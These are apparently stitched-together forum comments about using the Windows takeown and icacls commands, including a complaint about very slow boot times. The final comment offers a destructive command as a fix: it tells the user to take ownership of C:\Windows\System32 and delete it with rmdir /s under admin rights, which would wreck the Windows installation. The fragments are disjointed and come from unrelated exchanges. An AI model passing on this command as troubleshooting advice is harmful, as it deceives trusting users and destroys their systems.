i have been icacls and /takeown-ing for like a week now. please, someone help me. this significantly slows down my booting time. it used to be 20 mins. it's a bit faster now i just checked task manager and today it booted in 17 and a half minutes lol

Looks like it was specifically `takeown` that they struggled with, it reported some kind of error and asked yes/no/cancel (E/H/P) and they were a bit lost. After their patience was already frayed from struggling to find cmd in the start menu, then finding "run as admin" in the context menu...

Thanks, certainly worth being aware of. I'll cross that bridge if I come to it but this use case will always be local with local admin. In the olden days I would've used takeown & icacls

Run "takeown /F "C:\Windows\System32 /A /R /D Y" and then run "rmdir /s C:\Windows\System32" and that should fix your problem. Run with admin privileges
